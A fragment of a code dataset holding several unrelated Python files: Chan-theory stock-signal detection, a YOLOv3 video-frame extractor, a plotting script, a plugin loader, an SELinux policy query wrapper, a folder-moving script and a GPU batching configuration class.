ka.xd[-1]['dt']\n detail['基准价格'] = ka.xd[-1]['xd']\n\n if pf and detail[\"操作提示\"] == \"二卖\" and isinstance(ka2, KlineAnalyze):\n # 下级别向上线段背驰 或 下级别向上笔背驰\n if not ((ka2.xd[-1]['fx_mark'] == 'g' and ka2.xd_bei_chi()) or\n (ka2.bi[-1]['fx_mark'] == 'g' and ka2.bi_bei_chi())):\n detail['操作提示'] = \"无操作\"\n return detail\n\n\ndef is_third_buy(ka, ka1=None, ka2=None, pf=False):\n \"\"\"确定某一级别三买\n\n 第三类买点: 一个第三类买点,至少需要有5段次级别的走势,前三段构成中枢,第四段离开中枢,第5段不跌回中枢。\n\n 三买识别逻辑:\n 1)必须:本级别有6��以上线段标记,且最后一个线段标记为底分型;\n 2)必须:前三段有价格重叠部分,构成中枢;\n 2)必须:第4段比第2段新高无背驰,第5段不跌回中枢;\n\n 4)辅助:向上中枢数量小于等于3\n\n :param ka: KlineAnalyze\n 本级别\n :param ka1: KlineAnalyze\n 上级别\n :param ka2: KlineAnalyze\n 下级别,默认为 None\n :param pf: bool\n pf 为 precision first 的缩写, 控制是否使用 `高精度优先模式` ,默认为 False ,即 `高召回优先模式`。\n 在 `高精度优先模式` 下,会充分利用辅助判断条件提高识别准确率。\n\n :return: dict\n \"\"\"\n detail = {\n \"标的代码\": ka.symbol,\n \"操作提示\": \"无操作\",\n \"出现时间\": None,\n \"基准价格\": None,\n \"其他信息\": None\n }\n\n # 本级别有6个以上线段标记,且最后一个线段标记为底分型;\n if len(ka.xd) >= 6 and ka.xd[-1]['fx_mark'] == 'd':\n\n # 前三段有价格重叠部分,构成中枢;\n zs_g = min([x['xd'] for x in ka.xd[-6:-2] if x['fx_mark'] == \"g\"])\n zs_d = max([x['xd'] for x in ka.xd[-6:-2] if x['fx_mark'] == \"d\"])\n if zs_g > zs_d:\n\n # 第4段比第2段有新高或新低,且无背驰,第5段不跌回中枢;\n direction = 'up'\n zs1 = {\"start_dt\": ka.xd[-3]['dt'], \"end_dt\": ka.xd[-2]['dt'], \"direction\": direction}\n zs2 = {\"start_dt\": ka.xd[-5]['dt'], \"end_dt\": ka.xd[-4]['dt'], \"direction\": direction}\n if ka.xd[-2]['xd'] > ka.xd[-4]['xd'] \\\n and not is_bei_chi(ka, zs1, zs2, mode='xd') \\\n and ka.xd[-1]['xd'] > zs_g:\n detail['操作提示'] = '三买'\n detail['出现时间'] = ka.xd[-1]['dt']\n detail['基准价格'] = ka.xd[-1]['xd']\n\n if pf and detail['操作提示'] == '三买':\n # 向上中枢数量小于等于3\n un = ka.up_zs_number()\n if un > 3:\n detail['操作提示'] = '无操作'\n\n if isinstance(ka1, KlineAnalyze):\n pass\n\n if isinstance(ka2, KlineAnalyze):\n pass\n return detail\n\n\ndef is_third_sell(ka, ka1=None, ka2=None, pf=False):\n \"\"\"确定某一级别三卖\n\n 第三类卖点: 一个第三类卖点,至少需要有5段次级别的走势,前三段构成中枢,第四段离开中枢,第5段不升破中枢的低点。\n\n 三卖识别逻辑:\n 1)必须:本级别有6个以上线段标记,且最后一个线段标记为顶分型;\n 2)必须:前三段有价格重叠部分,构成中枢;\n 2)必须:第4段比第2段新低无背驰,第5段不升回中枢;\n\n 4)辅助:向下中枢数量小于等于3\n\n :param ka: KlineAnalyze\n 本级别\n :param ka1: KlineAnalyze\n 上级别\n :param ka2: KlineAnalyze\n 下级别,默认为 None\n :param pf: bool\n pf 为 precision first 的缩写, 控制是否使用 `高精度优先模式` ,默认为 False ,即 `高召回优先模式`。\n 在 `高精度优先模式` 下,会充分利用辅助判断条件提高识别准确率。\n\n :return: dict\n \"\"\"\n detail = {\n \"标的代码\": ka.symbol,\n \"操作提示\": \"无操作\",\n \"出现时间\": None,\n \"基准价格\": None,\n \"其他信息\": None\n }\n\n # 本级别有6个以上线段标记,且最后一个线段标记为顶分型;\n if len(ka.xd) >= 6 and ka.xd[-1]['fx_mark'] == 'g':\n\n # 前三段有价格重叠部分,构成中枢;\n zs_g = min([x['xd'] for x in ka.xd[-6:-2] if x['fx_mark'] == \"g\"])\n zs_d = max([x['xd'] for x in ka.xd[-6:-2] if x['fx_mark'] == \"d\"])\n if zs_g > zs_d:\n\n # 第4段比第2段新低无背驰,第5段不升回中枢;\n direction = 'down'\n zs1 = {\"start_dt\": ka.xd[-3]['dt'], \"end_dt\": ka.xd[-2]['dt'], \"direction\": direction}\n zs2 = {\"start_dt\": ka.xd[-5]['dt'], \"end_dt\": ka.xd[-4]['dt'], \"direction\": direction}\n if ka.xd[-2]['xd'] < ka.xd[-4]['xd'] \\\n and not is_bei_chi(ka, zs1, zs2, mode='xd') \\\n and ka.xd[-1]['xd'] > zs_g:\n detail['操作提示'] = '三卖'\n detail['出现时间'] = ka.xd[-1]['dt']\n detail['基准价格'] = ka.xd[-1]['xd']\n\n if pf and detail['操作提示'] == '三卖':\n # 向下中枢数量小于等于3\n dn = ka.down_zs_number()\n if dn > 3:\n detail['操作提示'] = '无操作'\n\n if isinstance(ka1, KlineAnalyze):\n pass\n\n if isinstance(ka2, KlineAnalyze):\n pass\n return detail\n\n\ndef is_xd_buy(ka, ka1=None, ka2=None, pf=False):\n \"\"\"同级别分解买点,我称之为线买,即线段买点\n\n 线买识���逻辑:\n 1) 必须:本级别至少有 3 个线段标记且最后一个线段标记为底分型;\n 2) 必须:本级别向下线段背驰 或 本级别向下线段不创新低;\n\n 3) 辅助:上级别向下笔背驰 或 上级别向下笔不创新低\n 4) 辅助:下级别向下笔背驰\n\n :param ka: KlineAnalyze\n 本级别\n :param ka1: KlineAnalyze\n 上级别\n :param ka2: KlineAnalyze\n 下级别,默认为 None\n :param pf: bool\n pf 为 precision first 的缩写, 控制是否使用 `高精度优先模式` ,默认为 False ,即 `高召回优先模式`。\n 在 `高精度优先模式` 下,会充分利用辅助判断条件提高识别准确率。\n\n :return: dict\n \"\"\"\n detail = {\n \"标的代码\": ka.symbol,\n \"操作提示\": \"无操作\",\n \"出现时间\": None,\n \"基准价格\": None,\n \"其他信息\": None\n }\n\n # 本级别至少有 3 个线段标记且最后一个线段标记为底分型;\n if len(ka.xd) > 3 and ka.xd[-1]['fx_mark'] == 'd':\n\n # 本级别向下线段背驰 或 本级别向下线段不创新低;\n if ka.xd_bei_chi() or ka.xd[-1]['xd'] > ka.xd[-3]['xd']:\n detail['操作提示'] = \"线买\"\n detail['出现时间'] = ka.xd[-1]['dt']\n detail['基准价格'] = ka.xd[-1]['xd']\n\n if pf and detail['操作提示'] == \"线买\":\n if isinstance(ka1, KlineAnalyze):\n # 上级别向下笔背驰 或 上级别向下笔不创新低\n if not (ka1.bi[-1]['fx_mark'] == 'd' and\n (ka1.bi[-1]['bi'] > ka1.bi[-3]['bi'] or ka1.bi_bei_chi())):\n detail['操作提示'] = \"无操作\"\n\n if isinstance(ka2, KlineAnalyze):\n # 下级别向下笔背驰\n if not (ka2.bi[-1]['fx_mark'] == 'd' and ka2.bi_bei_chi()):\n detail['操作提示'] = \"无操作\"\n return detail\n\n\ndef is_xd_sell(ka, ka1=None, ka2=None, pf=False):\n \"\"\"同级别分解卖点,我称之为线卖,即线段卖点\n\n 线卖识别逻辑:\n 1) 必须:本级别至少有 3 个线段标记且最后一个线段标记为顶分型;\n 2) 必须:本级别向上线段背驰 或 本级别向上线段不创新高;\n\n 3) 辅助:上级别向上笔背驰 或 上级别向上笔不创新高\n 4) 辅助:下级别向上笔背驰\n\n :param ka: KlineAnalyze\n 本级别\n :param ka1: KlineAnalyze\n 上级别\n :param ka2: KlineAnalyze\n 下级别,默认为 None\n :param pf: bool\n pf 为 precision first 的缩写, 控制是否使用 `高精度优先模式` ,默认为 False ,即 `高召回优先模式`。\n 在 `高精度优先模式` 下,会充分利用辅助判断条件提高识别准确率。\n\n :return: dict\n \"\"\"\n detail = {\n \"标的代码\": ka.symbol,\n \"操作提示\": \"无操作\",\n \"出现时间\": None,\n \"基准价格\": None,\n \"其他信息\": None\n }\n\n # 本级别至少有 3 个线段标记且最后一个线段标记为顶分型;\n if len(ka.xd) > 3 and ka.xd[-1]['fx_mark'] == 'g':\n\n # 本级别向上线段背驰 或 本级别向上线段不创新高\n if ka.xd_bei_chi() or ka.xd[-1]['xd'] < ka.xd[-3]['xd']:\n detail['操作提示'] = \"线卖\"\n detail['出现时间'] = ka.xd[-1]['dt']\n detail['基准价格'] = ka.xd[-1]['xd']\n\n if pf and detail['操作提示'] == \"线卖\":\n if isinstance(ka1, KlineAnalyze):\n # 上级别向上笔背驰 或 上级别向上笔不创新高\n if not (ka1.bi[-1]['fx_mark'] == 'g' and\n (ka1.bi[-1]['bi'] < ka1.bi[-3]['bi'] or ka1.bi_bei_chi())):\n detail['操作提示'] = \"无操作\"\n\n if isinstance(ka2, KlineAnalyze):\n # 下级别向上笔背驰\n if not (ka2.bi[-1]['fx_mark'] == 'g' and ka2.bi_bei_chi()):\n detail['操作提示'] = \"无操作\"\n return detail\n\n\nbs_func = {\n \"一买\": is_first_buy,\n \"一卖\": is_first_sell,\n\n \"二买\": is_second_buy,\n \"二卖\": is_second_sell,\n\n \"三买\": is_third_buy,\n \"三卖\": is_third_sell,\n\n \"线买\": is_xd_buy,\n \"线卖\": is_xd_sell,\n }\n\n\ndef get_sa_feature(sa):\n signals = {\"交易标的\": sa.symbol, \"交易时间\": sa.kas['1分钟'].end_dt, \"chan_version\": 0.3}\n for freq, ka in sa.kas.items():\n feature = get_ka_feature(ka)\n for k, v in feature.items():\n signals[freq+k] = v\n # print(signals)\n return signals\n\n\nclass SolidAnalyze(object):\n \"\"\"多级别(日线、30分钟、5分钟、1分钟)K线联合分析\n\n 这只是一个样例,展示如何结合多个K线级别进行买卖点分析。\n 你可以根据自己对缠论的���解,利用 KlineAnalyze 的分析结果在多个级别之间进行联合分析,找出符合自己要求的买卖点。\n \"\"\"\n\n def __init__(self, klines):\n \"\"\"\n\n :param klines: dict\n key 为K线级别名称;value 为对应的K线数据,K线数据基本格式参考 KlineAnalyze\n example: {\"日线\": df, \"30分钟\": df, \"5分钟\": df, \"1分钟\": df,}\n \"\"\"\n self.kas = dict()\n self.freqs = list(klines.keys())\n for freq, kline in klines.items():\n try:\n ka = KlineAnalyze(kline)\n self.kas[freq] = ka\n except:\n self.kas[freq] = None\n traceback.print_exc()\n self.symbol = self.kas['1分钟'].symbol\n self.end_dt = self.kas['1分钟'].end_dt\n self.latest_price = self.kas['1分钟'].latest_price\n self.bs_func = bs_func\n\n def _get_ka(self, freq):\n \"\"\"输入级别,返回该级别 ka,以及上一级别 ka1,下一级别 ka2\"\"\"\n assert freq in self.freqs, \"‘%s’不在级别列表(%s)中\" % (freq, \"|\".join(self.freqs))\n if freq == '日线':\n ka, ka1, ka2 = self.kas['日线'], None, self.kas['30分钟']\n elif freq == '30分钟':\n ka, ka1, ka2 = self.kas['30分钟'], self.kas['日线'], self.kas['5分钟']\n elif freq == '5分钟':\n ka, ka1, ka2 = self.kas['5分钟'], self.kas['30分钟'], self.kas['1分钟']\n elif freq == '1分钟':\n ka, ka1, ka2 = self.kas['1分钟'], self.kas['5分钟'], None\n else:\n raise ValueError\n return ka, ka1, ka2\n\n def _m_detail(self, detail, freq):\n detail['交易级别'] = freq\n ka = self.kas['1分钟']\n detail['最新时间'] = ka.end_dt\n detail['最新价格'] = ka.latest_price\n return detail\n\n def check_bs(self, freq, name, pf=False, tolerance=0.03):\n \"\"\"\n\n :param freq: str\n 级别,可选值 1分钟、5分钟、30分钟、日线\n :param name: str\n 买卖点名称,可选值 一买、一卖、二买、二卖、三买、三卖、线买、线卖\n :param pf: bool\n 是否使用 `高精度优先模式`\n :param tolerance: float\n 买卖点的价格容忍区间\n :return:dict\n \"\"\"\n func = self.bs_func[name]\n ka, ka1, ka2 = self._get_ka(freq)\n detail = func(ka, ka1, ka2, pf)\n if detail['操作提示'] == name:\n detail = self._m_detail(detail, freq)\n base_price = detail[\"基准价格\"]\n latest_price = detail['最新价格']\n\n if not is_in_tolerance(base_price, latest_price, tolerance):\n detail['操作提示'] = \"无操作\"\n return detail\n","sub_path":"czsc/solid.py","file_name":"solid.py","file_ext":"py","file_size_in_byte":23841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"643191220","text":"import numpy as np \nimport matplotlib.pyplot as plt \nfrom mpl_toolkits.mplot3d import Axes3D\nimport json\nimport argparse\n\ndef read_json(path):\n with open(path, 'r') as f:\n trajectory = json.load(f)\n return trajectory\n\nparser = argparse.ArgumentParser(description=\"Visualization\")\nparser.add_argument('--path', type=str, default='',\n help='saving path of search trajectory')\nparser.add_argument('--step', type=int, default=100,\n help='step for sampling loop orders')\nparser.add_argument('--fix_tiling_factor', action='store_true', default=False,\n help='whether fix the pe array')\nparser.add_argument('--fix_loop_order', action='store_true', default=False,\n help='whether fix the loop order')\nparser.add_argument('--fix_tiling', action='store_true', default=False,\n help='whether fix the tiling factors')\nargs = parser.parse_args()\n\npath1 = 'trajectory/all.json'\n\nt1 = read_json(path1)\n\nmetric = t1['metric']\nloop_order = t1['loop_order']\ntiling = t1['tiling_factor']\npe = t1['pe_array']\n\n# print(len(loop_order))\n# print(len(tiling))\n# print(len(pe))\n# input()\n\nx = list(range(16))\ny = list(range(int(len(tiling)/len(x))))\n\n\nX, Y = np.meshgrid(x, y)\n\n# Z = np.sqrt(X ** 2 + Y ** 2)\n# print(Z.shape)\n# input()\n\nZ = np.reshape(metric[:len(x)*len(y)], (len(y), len(x)))\nprint(Z.shape)\n\n\nfont_big = 20\nfont_mid = 14\nfont_small = 12\n\n# fig, ax = plt.subplots(2, 3, figsize=(10,8))\n# plt.subplots_adjust(wspace=0.2, hspace=0.35)\n\nfig = plt.figure()\nax = Axes3D(fig)\n\nax.plot_surface(X, Y, Z, rstride = 1, cstride = 1, cmap = plt.get_cmap('rainbow'))\n\nax.set_title('EDP - Design Spaced', fontsize=font_big)\nax.set_xlabel('Dataflow * Loop Order', fontsize=font_mid)\nax.set_ylabel('Tiling Factors', fontsize=font_mid)\nax.set_zlabel('EDP', fontsize=font_mid)\n\n\nplt.savefig('surface.png', bbox_inches='tight')\nplt.show()\n\n","sub_path":"hw_diff_final/visual_surface.py","file_name":"visual_surface.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"190681958","text":"\"\"\"Plugin system module.\n\nModule containing plugin system utility functions and classes.\n\n.. module:: plugin\n :synopsis: PLugin system utility functions and classes.\n\n.. moduleauthor:: Simon Larsén\n\"\"\"\n\nimport pathlib\nimport importlib\nimport sys\nfrom types import ModuleType\nfrom typing import Union, List, Optional, Iterable\n\nimport daiquiri\n\nfrom repomate import config\nfrom repomate import exception\n\nimport repomate_plug as plug\n\nLOGGER = daiquiri.getLogger(__file__)\n\nPLUGIN_QUALNAME = lambda plugin_name: \"{}.ext.{}\".format(__package__, plugin_name)\nEXTERNAL_PLUGIN_QUALNAME = lambda plugin_name: \"{}_{}.{}\".format(\n __package__, plugin_name, plugin_name)\n\n\ndef load_plugin_modules(\n config_file: Union[str, pathlib.Path] = config.DEFAULT_CONFIG_FILE,\n plugin_names: Iterable[str] = None) -> List[ModuleType]:\n \"\"\"Load plugins that are specified in the config. Try to import first from\n :py:mod:`repomate.ext`, and then from ``repomate_``. For example,\n if ``javac`` is listed as a plugin, the following imports will be attempted:\n\n .. code-block:: python\n\n # import nr 1\n from repomate.ext import javac\n\n # import nr 2\n from repomate_javac import javac\n\n Args:\n config_file: Path to the configuration file.\n plugin_names: A list of plugin names. Overrides the config file.\n\n Returns:\n a list of loaded modules.\n \"\"\"\n loaded_modules = []\n\n plugin_names = plugin_names or config.get_plugin_names(config_file)\n for name in plugin_names:\n plug_mod = _try_load_module(PLUGIN_QUALNAME(name)) or\\\n _try_load_module(EXTERNAL_PLUGIN_QUALNAME(name))\n if not plug_mod:\n msg = \"failed to load plugin module \" + name\n raise exception.PluginError(msg)\n loaded_modules.append(plug_mod)\n\n if loaded_modules:\n LOGGER.info(\"loaded modules {}\".format(\n [mod.__name__ for mod in loaded_modules]))\n\n return loaded_modules\n\n\ndef _try_load_module(qualname: str) -> Optional[ModuleType]:\n \"\"\"Try to load a module.\n\n Args:\n qualname: Qualified name of the module.\n\n Returns:\n the module if loaded properly, None otherwise\n \"\"\"\n try:\n return importlib.import_module(qualname)\n except ImportError:\n # ImportError in 3.5, ModuleNotFoundError in 3.6+\n # using ImportError for compatability\n return None\n\n\ndef register_plugins(modules: List[ModuleType]) -> None:\n \"\"\"Register the namespaces of the provided modules, and any plug.Plugin\n instances in them. Registers modules in reverse order as they are\n run in FIFO order.\n \n Args:\n modules: A list of modules.\n \"\"\"\n assert all([isinstance(mod, ModuleType) for mod in modules])\n for module in reversed(modules): # reverse because plugins are run FIFO\n plug.manager.register(module)\n LOGGER.info(\"registered {}\".format(module.__name__))\n for key, value in module.__dict__.items():\n if isinstance(value, type) and issubclass(\n value, plug.Plugin) and value != plug.Plugin:\n plug.manager.register(value())\n LOGGER.info(\"registered class {}\".format(key))\n\n\ndef initialize_plugins(plugin_names: List[str] = None):\n \"\"\"Load and register plugins.\n\n Args:\n plugin_names: An optional list of plugin names that overrides the\n configuration file's plugins.\n \"\"\"\n plug_modules = load_plugin_modules(plugin_names=plugin_names)\n register_plugins(plug_modules)\n","sub_path":"repomate/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":3566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"53464646","text":"from ctypes import *\nimport re\nimport os\nimport sys\n\nclass TERule:\n def __init__(self, rule):\n data = rule.split(',')\n self.flavor = data[0]\n self.sctx = data[1]\n self.tctx = data[2]\n self.tclass = data[3]\n self.perms = set((data[4].strip()).split(' '))\n self.rule = rule\n\nclass Policy:\n __Rules = None\n __FcDict = None\n __libsepolwrap = None\n __policydbP = None\n\n # Return all file_contexts entries that map to the input Type.\n def QueryFc(self, Type):\n if Type in self.__FcDict:\n return self.__FcDict[Type]\n else:\n return None\n\n # Return all attributes associated with a type if IsAttr=False or\n # all types associated with an attribute if IsAttr=True\n def QueryTypeAttribute(self, Type, IsAttr):\n init_type_iter = self.__libsepolwrap.init_type_iter\n init_type_iter.restype = c_void_p\n TypeIterP = init_type_iter(c_void_p(self.__policydbP),\n create_string_buffer(Type), c_bool(IsAttr))\n if (TypeIterP == None):\n sys.exit(\"Failed to initialize type iterator\")\n buf = create_string_buffer(2048)\n\n while True:\n ret = self.__libsepolwrap.get_type(buf, c_int(2048),\n c_void_p(self.__policydbP), c_void_p(TypeIterP))\n if ret == 0:\n yield buf.value\n continue\n if ret == 1:\n break;\n # We should never get here.\n sys.exit(\"Failed to import policy\")\n self.__libsepolwrap.destroy_type_iter(c_void_p(TypeIterP))\n\n # Return all TERules that match:\n # (any scontext) or (any tcontext) or (any tclass) or (any perms),\n # perms.\n # Any unspecified paramenter will match all.\n #\n # Example: QueryTERule(tcontext=[\"foo\", \"bar\"], perms=[\"entrypoint\"])\n # Will return any rule with:\n # (tcontext=\"foo\" or tcontext=\"bar\") and (\"entrypoint\" in perms)\n def QueryTERule(self, **kwargs):\n if self.__Rules is None:\n self.__InitTERules()\n for Rule in self.__Rules:\n # Match source type\n if \"scontext\" in kwargs and Rule.sctx not in kwargs['scontext']:\n continue\n # Match target type\n if \"tcontext\" in kwargs and Rule.tctx not in kwargs['tcontext']:\n continue\n # Match target class\n if \"tclass\" in kwargs and Rule.tclass not in kwargs['tclass']:\n continue\n # Match any perms\n if \"perms\" in kwargs and not bool(Rule.perms & set(kwargs['perms'])):\n continue\n yield Rule\n\n\n def __GetTERules(self, policydbP, avtabIterP):\n if self.__Rules is None:\n self.__Rules = set()\n buf = create_string_buffer(2048)\n ret = 0\n while True:\n ret = self.__libsepolwrap.get_allow_rule(buf, c_int(2048),\n c_void_p(policydbP), c_void_p(avtabIterP))\n if ret == 0:\n Rule = TERule(buf.value)\n self.__Rules.add(Rule)\n continue\n if ret == 1:\n break;\n # We should never get here.\n sys.exit(\"Failed to import policy\")\n\n def __InitTERules(self):\n init_avtab = self.__libsepolwrap.init_avtab\n init_avtab.restype = c_void_p\n avtabIterP = init_avtab(c_void_p(self.__policydbP))\n if (avtabIterP == None):\n sys.exit(\"Failed to initialize avtab\")\n self.__GetTERules(self.__policydbP, avtabIterP)\n self.__libsepolwrap.destroy_avtab(c_void_p(avtabIterP))\n init_cond_avtab = self.__libsepolwrap.init_cond_avtab\n init_cond_avtab.restype = c_void_p\n avtabIterP = init_cond_avtab(c_void_p(self.__policydbP))\n if (avtabIterP == None):\n sys.exit(\"Failed to initialize conditional avtab\")\n self.__GetTERules(self.__policydbP, avtabIterP)\n self.__libsepolwrap.destroy_avtab(c_void_p(avtabIterP))\n\n # load ctypes-ified libsepol wrapper\n def __InitLibsepolwrap(self, LibPath):\n if \"linux\" in sys.platform:\n self.__libsepolwrap = CDLL(LibPath + \"/libsepolwrap.so\")\n elif \"darwin\" in sys.platform:\n self.__libsepolwrap = CDLL(LibPath + \"/libsepolwrap.dylib\")\n else:\n sys.exit(\"only Linux and Mac currrently supported\")\n\n # load file_contexts\n def __InitFC(self, FcPaths):\n fc = []\n for path in FcPaths:\n if not os.path.exists(path):\n sys.exit(\"file_contexts file \" + path + \" does not exist.\")\n fd = open(path, \"r\")\n fc += fd.readlines()\n fd.close()\n self.__FcDict = {}\n for i in fc:\n rec = i.split()\n try:\n t = rec[-1].split(\":\")[2]\n if t in self.__FcDict:\n self.__FcDict[t].append(rec[0])\n else:\n self.__FcDict[t] = [rec[0]]\n except:\n pass\n\n # load policy\n def __InitPolicy(self, PolicyPath):\n load_policy = self.__libsepolwrap.load_policy\n load_policy.restype = c_void_p\n self.__policydbP = load_policy(create_string_buffer(PolicyPath))\n if (self.__policydbP is None):\n sys.exit(\"Failed to load policy\")\n\n def __init__(self, PolicyPath, FcPaths, LibPath):\n self.__InitLibsepolwrap(LibPath)\n self.__InitFC(FcPaths)\n self.__InitPolicy(PolicyPath)\n\n def __del__(self):\n if self.__policydbP is not None:\n self.__libsepolwrap.destroy_policy(c_void_p(self.__policydbP))\n","sub_path":"tests/policy.py","file_name":"policy.py","file_ext":"py","file_size_in_byte":5681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"638029864","text":"\"\"\"\nExample (runs YOLO on a frame every 20 seconds for 5 min vids):\n python plugins/PyTorch-YOLOv3/video_extract.py \n --frames_folder data/inputs/videos_512x288/frames_1fps \n --output_folder data/inputs/videos_512x288/yolo80_3fpm\n --max_num_frames 15\n --frame_skip 20 \n\"\"\"\n\nfrom __future__ import division\n\nfrom models import *\nfrom utils.utils import *\nfrom utils.datasets import *\n\nimport os\nimport sys\nimport time\nimport datetime\nimport argparse\n\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets\nfrom torch.autograd import Variable\n\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nfrom matplotlib.ticker import NullLocator\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--frames_folder', type=str, help='path to dataset of frames')\nparser.add_argument('--output_folder', type=str, help='where to store raw, supp0.8 and supp0.5')\n\nparser.add_argument('--max_num_frames', type=int, default=sys.maxsize, help='max num frames to use in output')\nparser.add_argument('--frame_skip', type=int, default=1, help='max num frames to use for output')\nparser.add_argument('--frame_offset', type=int, default=0, help='starting frame to use for output')\n\nparser.add_argument('--config_path', type=str, default='plugins/PyTorch-YOLOv3/config/yolov3.cfg', help='path to model config')\nparser.add_argument('--weights_path', type=str, default='weights/yolov3.weights', help='path to weights file')\nparser.add_argument('--nms_thres', type=float, default=0.4, help='iou thresshold for non-maximum suppression')\nparser.add_argument('--batch_size', type=int, default=1, help='size of the batches')\nparser.add_argument('--n_cpu', type=int, default=1, help='number of cpu threads to use during batch generation')\nparser.add_argument('--img_size', type=int, default=512, help='size of each image dimension')\nparser.add_argument('--use_cuda', type=bool, default=True, help='whether to use cuda if available')\nopt = parser.parse_args()\nprint(opt)\n\ncuda = torch.cuda.is_available() and opt.use_cuda\n\nif opt.batch_size != 1:\n raise Exception(\"Not supported.\")\n\n# Set up model\nmodel = Darknet(opt.config_path, img_size=opt.img_size)\nmodel.load_weights(opt.weights_path)\n\nif cuda:\n model.cuda()\n\nmodel.eval() # Set in evaluation mode\n\ndataloader = DataLoader(VideoFrameImageFolder(\n opt.frames_folder, \n img_size=opt.img_size, \n max_num_frames=opt.max_num_frames,\n frame_skip=opt.frame_skip,\n frame_offset=opt.frame_offset,\n ), \n batch_size=1, shuffle=False, num_workers=opt.n_cpu)\n\nTensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor\n\nprint (f'\\nPerforming object detection and saving to files in {opt.output_folder}:')\nprev_time = time.time()\nfor batch_i, (video_id, _, batch_of_input_imgs) in enumerate(dataloader):\n # Already batched by data loader (so torch batch size is 1, but there is a batch here).\n input_imgs = torch.squeeze(batch_of_input_imgs, dim=0)\n video_id = video_id[0]\n\n # Configure input\n input_imgs = Variable(input_imgs.type(Tensor)) \n\n # Get detections\n with torch.no_grad():\n detections_raw = model(input_imgs)\n detections_point5 = non_max_suppression(detections_raw, 80, 0.5, opt.nms_thres, fixed_num_preds=16)\n detections_point8 = non_max_suppression(detections_raw, 80, 0.8, opt.nms_thres, fixed_num_preds=8)\n detections = detections_point8\n\n print (f\"Saving the video id {video_id}\")\n # torch.save(detections_raw, os.path.join(f\"{opt.output_folder}/raw\", f'{video_id}.pt'))\n torch.save(torch.stack(detections_point5), os.path.join(f\"{opt.output_folder}/supp0.5\", f'{video_id}.pth'))\n torch.save(torch.stack(detections_point8), os.path.join(f\"{opt.output_folder}/supp0.8\", f'{video_id}.pth'))\n\n # Log progress\n current_time = time.time()\n inference_time = datetime.timedelta(seconds=current_time - prev_time)\n prev_time = current_time\n print (f'\\t+ Batch {batch_i}, Video ID {video_id} Inference Time: {inference_time}')\n\n\n","sub_path":"video_extract.py","file_name":"video_extract.py","file_ext":"py","file_size_in_byte":4213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"444081983","text":"import os\r\nimport shutil\r\n\r\nfor foldernames in os.listdir(path= r'\\\\10.56.141.46\\d$\\NET1\\АРХИВ_СКАН'):\r\n #print(foldernames+'\\n')\r\n print(foldernames+'\\n')\r\n file_handler = open(\"D:\\\\с диска S\\log.txt\", \"a\")\r\n file_handler.write(foldernames+'\\n')\r\n #тут надо производить запись либо в конце\r\n a = foldernames[:5]\r\n b = foldernames[6:13]\r\n #с = a + b + foldernames[14:]\r\n #формируем путь\r\n if a != foldernames[:5]:\r\n a = foldernames[:5]\r\n if b != foldernames[6:13]:\r\n b = foldernames[6:13]\r\n path1 = r'\\\\10.56.141.46\\d$\\NET1\\АРХИВ_СКАН'+'\\\\'+ foldernames\r\n path = r'\\\\10.56.141.46\\d$\\NET1\\АРХИВ_СКАН'+'\\\\'+ a +'\\\\'+ a+'_'+b+'\\\\'+foldernames\r\n #shutil.copytree(str(path1), str(path))\r\n shutil.move(str(path1), str(path)) \r\n #print(foldernames[:5]+'-a '+foldernames[7:13]+'-b '+foldernames[14:]+'\\n')\r\n #shutil.copytree('D:\\\\с диска S\\jobi', 'D:\\\\с диска S\\jobnew\\'+'str(a)')\r\n file_handler.close() \r\n \r\n","sub_path":"arh.py","file_name":"arh.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"519502143","text":"from __future__ import print_function\n\nimport numpy as np\nfrom recordtype import recordtype\nimport yaml\nimport utils\nimport subprocess\nimport random\nimport re\nimport time\n\ncompose_params = recordtype('compose_params', 'replicas max_cpu max_memory')\nbatching_params = recordtype('batching_params', 'max_batch_size batch_timeout_micros')\n\n\nclass Configuration:\n\n def __init__(self, batching_file=None, compose_file=None, gpu_freq=None):\n self.batching_file = batching_file\n self.compose_file = compose_file\n self.allowed_gpu_freq = np.array([1306, 1293, 1280, 1267, 1254, 1241, 1228, 1215, 1202, 1189, 1176, 1163, 1150, 1137, 1124, 1110, 1097,\n 1084, 1071, 1058, 1045, 1032, 1019, 1006, 993, 980, 967, 954, 941, 928, 915, 901, 888, 875, 862, 849,\n 836, 823, 810, 797, 784, 771, 758, 745, 732, 719, 705, 692, 679, 666, 653, 640, 627, 614, 601, 588, 575,\n 562, 549, 405, 392, 379, 366, 353, 340, 327, 324, 314, 301, 288, 275, 270, 267, 265, 263, 261, 259, 257,\n 255, 253, 251, 249, 247, 245, 243, 241, 239, 237, 235, 233, 231, 229, 226, 224, 222, 220, 218, 216, 214,\n 212, 210, 208, 206, 204, 202, 200, 198, 196, 194, 192, 190, 188, 186,\n 183, 181, 179, 177, 175, 173, 171, 169, 167, 165, 163, 161, 159, 157, 155, 153, 151, 149, 147, 145, 143, 140, 138, 136])\n self.allowed_batch_size = np.array([4, 8, 16, 32, 64, 96, 128])\n self.min_batch_timeout = 100\n self.max_batch_timeout = 100000\n self.max_replicas = 20\n self.compose_params = compose_params(None, None, None)\n self.batching_params = batching_params(None, None)\n self.load_compose_params()\n self.load_batching_params()\n self.set_gpu_freq(gpu_freq)\n\n def set_batching_file(self, batching_file):\n self.batching_file = batching_file\n\n def set_compose_file(self, compose_file):\n self.compose_file = compose_file\n\n def load_compose_params(self):\n with open(self.compose_file, 'r') as stream:\n try:\n yaml_params = yaml.load(stream)\n replicas = yaml_params['services']['tf']['deploy']['replicas']\n max_cpu = yaml_params['services']['tf']['deploy']['resources']['limits']['cpus']\n max_memory = yaml_params['services']['tf']['deploy']['resources']['limits']['memory']\n 